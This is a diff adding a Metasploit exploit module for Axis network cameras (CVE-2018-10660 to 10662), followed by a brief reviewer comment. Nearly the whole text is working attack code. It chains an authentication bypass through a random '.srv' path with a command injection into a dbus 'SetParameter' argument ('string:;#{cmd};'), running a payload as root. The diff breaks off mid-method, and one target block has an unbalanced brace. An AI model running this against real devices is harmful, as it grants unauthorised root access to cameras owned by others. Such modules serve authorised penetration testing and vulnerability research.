modules/exploits/linux/http/axis_srv_parhand_rce.rb

```diff
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Axis Camera .srv/parhand RCE',
+      'Description'    => %q{
+        This module exploits an auth bypass in .srv functionality and a
+        command injection in parhand to execute code as the root user.
+      },
+      'Author'         => [
+        'Or Peles',       # Vulnerability discovery (VDOO)
+        'wvu',            # Metasploit module
+        'Brent Cook',     # Metasploit module
+        'Jacob Robles',   # Metasploit module
+        'Matthew Kienow', # Metasploit module
+        'Wei Chen',       # Metasploit module
+        'Shelby Pace',    # Metasploit module
+        'Chris Lee',      # Metasploit module
+        'Cale Black'      # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-10660'],
+        ['CVE', '2018-10661'],
+        ['CVE', '2018-10662'],
+        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/']
+      ],
+      'DisclosureDate' => 'Jun 18 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {'BadChars' => ' '}
+         }
+        ],
+        ['Linux Dropper',
+         'Platform'    => 'linux',
+         'Arch'        => ARCH_ARMLE,
+         'Type'        => :linux_dropper
+        ]
+      ],
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      # TODO: Make this work
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
+
+    vprint_status(cmd)
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        # TODO: Break down this line
+        'args'    => "--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SetParameter string:root.Time.DST.Enabled string:;#{cmd};"
```

Comment:
To-do: do badchar analysis on the injection and investigate other vectors. I know that doubled semicolons is a syntax error, for instance.